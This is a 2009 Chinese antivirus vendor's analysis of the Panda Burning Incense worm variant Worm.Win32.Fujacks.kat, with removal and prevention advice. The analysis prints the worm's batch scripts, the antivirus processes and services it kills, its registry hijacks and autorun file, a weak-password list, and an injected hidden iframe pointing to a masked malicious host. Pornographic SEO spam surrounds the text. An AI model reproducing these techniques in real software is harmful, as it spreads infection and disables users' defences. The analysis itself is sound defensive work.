一级特黄性生活大片免费观看-一级特黄性色生活片-一级特黄性色生活片一区二区-一级特黄视频-国产最新视频-国产最新精品

   
首 頁  |  微點(diǎn)新聞  |  業(yè)界動態(tài)  |  安全資訊  |  安全快報  |  產(chǎn)品信息  |  網(wǎng)絡(luò)版首頁
通行證  |  客服中心  |  微點(diǎn)社區(qū)  |  微點(diǎn)郵局  |  常見問題  |  在線訂購  |  各地代理商
 

熊貓燒香變種Worm.Win32.Fujacks.kat
來源:  2009-01-20 17:14:52

熊貓燒香變種Worm.Win32.Fujacks.kat

Worm.Win32.Fujacks.kat

捕獲時間

2009-1-20

病毒摘要

該樣本是使用“Delphi”編寫的熊貓燒香變種,由微點(diǎn)主動防御軟件自動捕獲,采用“ASPack”加殼方式試圖躲避特征碼掃描,加殼后長度為 “295,166字節(jié)”,圖標(biāo)采用被感染文件的圖標(biāo),使用“exe”擴(kuò)展名,通過“網(wǎng)頁木馬”、“文件捆綁”、“移動存儲介質(zhì)”、“局域網(wǎng)”等途徑植入用戶計(jì)算機(jī),運(yùn)行后下載其他木馬到本地運(yùn)行。

感染對象

Windows 2000/Windows XP/Windows 2003

傳播途徑

網(wǎng)頁木馬、文件捆綁、移動存儲介質(zhì)、局域網(wǎng)

防范措施

已安裝使用微點(diǎn)主動防御軟件的用戶,無須任何設(shè)置,微點(diǎn)主動防御將自動保護(hù)您的系統(tǒng)免受該病毒的入侵和破壞。無論您是否已經(jīng)升級到最新版本,微點(diǎn)主動防御都能夠有效清除該病毒。如果您沒有將微點(diǎn)主動防御軟件升級到最新版,微點(diǎn)主動防御軟件在發(fā)現(xiàn)該病毒后將報警提示您發(fā)現(xiàn)“未知木馬”,請直接選擇刪除處理(如圖1);


       圖1 微點(diǎn)主動防御軟件自動捕獲未知病毒(未升級)



如果您已經(jīng)將微點(diǎn)主動防御軟件升級到最新版本,微點(diǎn)將報警提示您發(fā)現(xiàn)"Worm.Win32.Fujacks.kat”,請直接選擇刪除(如圖2)。


       圖2 微點(diǎn)主動防御軟件升級后截獲已知病毒

對于未使用微點(diǎn)主動防御軟件的用戶,微點(diǎn)反病毒專家建議
1、不要在不明站點(diǎn)下載非官方版本的軟件進(jìn)行安裝,避免病毒通過捆綁的方式進(jìn)入您的系統(tǒng)。
2、建議關(guān)閉U盤自動播放,具體操作步驟:開始->運(yùn)行->gpedit.msc->計(jì)算機(jī)配置->管理模板->系統(tǒng)->在右側(cè)找到"關(guān)閉自動播放"->雙擊->選擇"已啟用"。
3、盡快將您的殺毒軟件特征庫升級到最新版本進(jìn)行查殺,并開啟防火墻攔截網(wǎng)絡(luò)異常訪問,如依然有異常情況請注意及時與專業(yè)的安全軟件廠商聯(lián)系獲取技術(shù)支持。
4、開啟windows自動更新,及時打好漏洞補(bǔ)丁。

病毒分析

該樣本程序被執(zhí)行后,讀取自身釋放出感染前的正常文件---UFReader.exe到當(dāng)前目錄下,名稱為記錄在文件末尾處的感染信息中的欲創(chuàng)建文件名字“UFReader.exe.exe”,并調(diào)用在目錄%Temp%\下創(chuàng)建的隨機(jī)名稱批處理文件,等待樣本程序進(jìn)程結(jié)束后,進(jìn)行對樣本的刪除并恢復(fù)感染前的正常文件,恢復(fù)后進(jìn)行調(diào)用運(yùn)行實(shí)現(xiàn)樣本運(yùn)行過程的隱藏,批處理文件內(nèi)容如下:

 
:try1
del "C:\感染后的正常文件名"
if exist "C:\感染后的正常文件名" goto try1
ren "C:\感染后的正常文件名.exe" "感染后的正常文件名"
if exist "感染后的正常文件名.exe" goto try2
"感染后的正常文件名"
:try2
del %0


嘗試刪除目錄%SystemRoot%\system32\drivers\下“TXPlatform.exe”文件,并釋放病毒衍生物“TXPlatform.exe”文件,成功后調(diào)用運(yùn)行“TXPlatform.exe”開啟一個新的進(jìn)程并結(jié)束樣本自身進(jìn)程。

“TXPlatform.exe”進(jìn)程啟動后,釋放名為“z.tmp”的文件到目錄%SystemDrive%\下,并經(jīng)過指定的解密創(chuàng)建“z1.tmp”名稱文件,創(chuàng)建下列“RESSDT”服務(wù):

 
項(xiàng):
HKLM\SYSTEM\CurrentControlSet\Services\RESSDT

鍵值:DisplayName
指向數(shù)據(jù):RESSDT
健值:ImagePath
指向數(shù)據(jù):%SystemDrive %\z1.tmp


服務(wù)創(chuàng)建成功后調(diào)用此服務(wù),驅(qū)動加載后恢復(fù)系統(tǒng)SSDT表,解除計(jì)算機(jī)部分殺軟的主動防御,達(dá)到自身保護(hù)的目的,成功后關(guān)閉此服務(wù),并將此服務(wù)與“z1.tmp”、“z.tmp”文件進(jìn)行刪除,實(shí)現(xiàn)對恢復(fù)系統(tǒng)SSDT表模塊的隱藏。

遍歷查找下列指定進(jìn)程,找到后嘗試關(guān)閉該進(jìn)程:

 
svchosL.exe


嘗試打開下列服務(wù),一旦成功打開便嘗試對該服務(wù)進(jìn)行下列的停止或刪除操作:

 
“Schedule”            停止服務(wù)
“sharedaccess”         停止服務(wù)
“kavsvc”              停止服務(wù)
“kavsvc”              刪除服務(wù)
“AVP”                停止服務(wù)
“AVP”                刪除服務(wù)
“McAfeeFramework”    停止服務(wù)
“McAfeeFramework”    刪除服務(wù)
“McShield”            停止服務(wù)
“McTaskManager”      停止服務(wù)
“McTaskManager”      刪除服務(wù)
“McShield”            刪除服務(wù)
“navapsvc”            刪除服務(wù)
“wscsvc”              刪除服務(wù)
“KPfwSvc”            刪除服務(wù)
“SNDSrvc”            刪除服務(wù)
“ccProxy”             刪除服務(wù)
“ccEvtMgr”            刪除服務(wù)
“ccSetMgr”            刪除服務(wù)
“SPBBCSvc”           刪除服務(wù)
“Symantec Core LC”     刪除服務(wù)
“NPFMntor”            刪除服務(wù)
“MskService”           刪除服務(wù)
“FireSvc”              刪除服務(wù)
“RsCCenter”           停止服務(wù)
“RsCCenter”           刪除服務(wù)
“RsRavMon”           停止服務(wù)
“RsRavMon”           刪除服務(wù)


遍歷查找包含下列文字的窗口,一旦找到便終止該進(jìn)程:

  
Winsock Expert
ComnView
SmartSniff
Sniff
CaptureNet
Spinet
Dsniff
嗅探
抓包


修改注冊表去除隱藏文件和文件夾屬性,實(shí)現(xiàn)自身隱藏目的:

 
項(xiàng):
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
鍵值:CheckedValue
數(shù)據(jù):0


刪除系統(tǒng)啟動項(xiàng)HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下指定安全軟件的啟動項(xiàng)鍵值,實(shí)現(xiàn)指定安全軟件不能隨機(jī)啟動:

 
鍵值:
kav
KAVPersonal50
AVP
McAfeeUpdaterUI
Network Associates Error Reporting Service
ShStatEXE


在注冊表HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\下添加下列項(xiàng),達(dá)到劫持大部分安全軟件的目的:

 
360hotfix.exe
360rpt.exe
360safe.exe
360safebox.exe
360tray.exe
agentsvr.exe
apvxdwin.exe
ast.exe
avcenter.exe
avengine.exe
avgnt.exe
avguard.exe
avltmain.exe
avp.exe
avp32.exe
avtask.exe
bdagent.exe
bdwizreg.exe
boxmod.exe
ccapp.exe
ccenter.exe
ccevtmgr.exe
ccregvfy.exe
ccsetmgr.exe
egui.exe
ekrn.exe
extdb.exe
frameworkservice.exe
frwstub.exe
guardfield.exe
iparmor.exe
kaccore.exe
kasmain.exe
kav32.exe
kavstart.exe
kavsvc.exe
kavsvcui.exe
kislnchr.exe
kissvc.exe
kmailmon.exe
knownsvr.exe
kpfw32.exe
kpfwsvc.exe
kregex.exe
kvfw.exe
kvmonxp.exe
kvmonxp.kxp
kvol.exe
kvprescan.exe
kvsrvxp.exe
kvwsc.exe
kvxp.kxp
kwatch.exe
livesrv.exe
makereport.exe
mcdash.exe
mcdash.exe
mcdetect.exe
mcdash.exe
mcshield.exe
mctskshd.exe
mcvsescn.exe
mcvsshld.exe
mghtml.exe
naprdmgr.exe
navapsvc.exe
navapw32.exe
navw32.exe
nmain.exe
nod32.exe
nod32krn.exe
nod32kui.exe
npfmntor.exe
oasclnt.exe
pavsrv51.exe
pfw.exe
psctrls.exe
psimreal.exe
psimsvc.exe
qqdoctormain.exe
ras.exe
ravmon.exe
ravmond.exe
ravstub.exe
ravtask.exe
rfwcfg.exe
rfwmain.exe
rfwproxy.exe
rfwsrv.exe
rsagent.exe
rsmain.exe
rsnetsvr.exe
rssafety.exe
safebank.exe
scan32.exe
scanfrm.exe
sched.exe
seccenter.exe
secnotifier.exe
SetupLD.exe
shstat.exe
smartup.exe
sndsrvc.exe
spbbcsvc.exe
symlcsvc.exe
tbmon.exe
uihost.exe
ulibcfg.exe
updaterui.exe
uplive.exe
vcr32.exe
vcrmon.exe
vptray.exe
vsserv.exe
vstskmgr.exe
webproxy.exe
xcommsvr.exe
xnlscn.exe

鍵值均為:debugger
數(shù)據(jù)均指向:ntsd -d


添加注冊表啟動項(xiàng),達(dá)到開機(jī)自啟動目的:

 
項(xiàng):
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
鍵值:Explorer
數(shù)據(jù):%SystemRoot%\system32\drivers\TXPlatform.exe


遍歷查找除下列指定的文件夾外的所有“.exe”,“.scr”,“.com”,“.pif”文件,找到后,讀取文件取得文件圖標(biāo)后到目錄%Temp%\下創(chuàng)建為該隨機(jī)名稱的圖標(biāo),拷貝自身替換文件,讀取創(chuàng)建的圖標(biāo)把拷貝過來的文件替換為原文件的圖標(biāo),并把原文件與感染信息寫入,并嘗試調(diào)用“winrar.exe”的相關(guān)指令感染壓縮包內(nèi)的文件,實(shí)現(xiàn)破壞用戶文件資料與自身的自我保護(hù),并在感染過的文件夾下,創(chuàng)建一個記錄感染日期的名為“ desktop_1.ini”的文件,并修改屬性為“只讀”、“隱藏”與“系統(tǒng)”。

 
windows
winrar
winnt
system32
documents and settings
system volume information
recycled
windows nt
windowsupdate
windows media player
outlook express
internet explorer
netmeeting
common files
complus applications
common files
messenger
installshield installation information
msn
microsoft frontpage
movie maker
msn gamin zone


并遍歷查找“.htm”, “.html”, “.asp”, “.aspx”, “.jsp”, “.php”類型文件,找到后定位到文件末尾,添加下列代碼,實(shí)現(xiàn)對網(wǎng)頁類型文件的掛馬:

  
<iframe src="http://www.52**S.COM/goto/mm.Htm" width=0 height=0></iframe>


刪除自身的除IPC$外的所有默認(rèn)共享,枚舉局域網(wǎng)共享,找到后嘗試使用指定的大量弱口令密碼與下列指定的用戶名進(jìn)行逐個嘗試訪問,成功后在局域網(wǎng)中傳播此病毒:

 
“Administrator”
“Guest”
“admin"
“Root”
“Apartment”
“Free”
“Both”
“Neutral”


等待訪問下列網(wǎng)址木馬列表進(jìn)行下載其它木馬并在下載后自動運(yùn)行:

 
http://www.ip****gou.com/goto/down.txt


該網(wǎng)址內(nèi)容為:

 
http://www.52**s.com/090110.exe


并訪問下列網(wǎng)址進(jìn)行自身統(tǒng)計(jì):

 
http://www.52**s.com/TJ.Htm


不斷遍歷磁盤,嘗試調(diào)用目錄%Temp%\下創(chuàng)建的隨機(jī)名稱批處理,刪除免疫文件夾,批處理內(nèi)容如下:

 
rmdir /s /q 盤符:\autorun.inf
del %0


拷貝自身名為“   .exe”到磁盤分區(qū)根目錄,并創(chuàng)建“autorun.inf”文件,均修改屬性為“只讀”、“隱藏”與“系統(tǒng)”,“autorun.inf”內(nèi)容為:

 
[AutoRun]
OPEN=   .exe
shell\open=打開(&O)
shell\open\Command=   .exe
shell\open\Default=1
shell\explore=資源管理器(&X)
shell\explore\Command=   .exe

 

免費(fèi)體驗(yàn)
下  載
安裝演示

主站蜘蛛池模板: 久久久久亚洲精品一区二区三区| 国产成人精品视频| 有码 在线| 久草国产视频| 欧美日韩一级片在线观看| 成人国产在线视频在线观看| 男女视频免费在线观看| 日韩不卡毛片| 99精品视频免费观看| 黄色大秀视频| 久久精品免费视频观看| 亚洲理论片在线中文字幕| 成年女人看片免费视频频| 精品国产一二三区| 日韩制服诱惑| 日韩毛片一级| 中文字幕一区二区在线视频| 二区视频在线| 国产亚洲欧美日韩国产片| 欧美一级va在线视频免费播放| 日韩女人做爰大片| 综合558欧美成人永久网站| 国产a自拍| 国产精品毛片一区| 毛片在线视频在线播放| 看美国毛片| 视频一区亚洲| 欧美又粗又硬又大久久久| 在线观看国产亚洲| 中国一级淫片aaa毛片毛片| 国产成人精品一区二区三在线观看| 久久精品国产线看观看亚洲| 久久青草热| 日本一级特黄高清ab片| 欧美一级特黄aaaaaa在线看首页| 正在播真实出轨炮对白| 在线免费观看精品| 91久久青青草原免费| 永久天堂| 91精品91久久久久久| 俄罗斯aa毛片极品|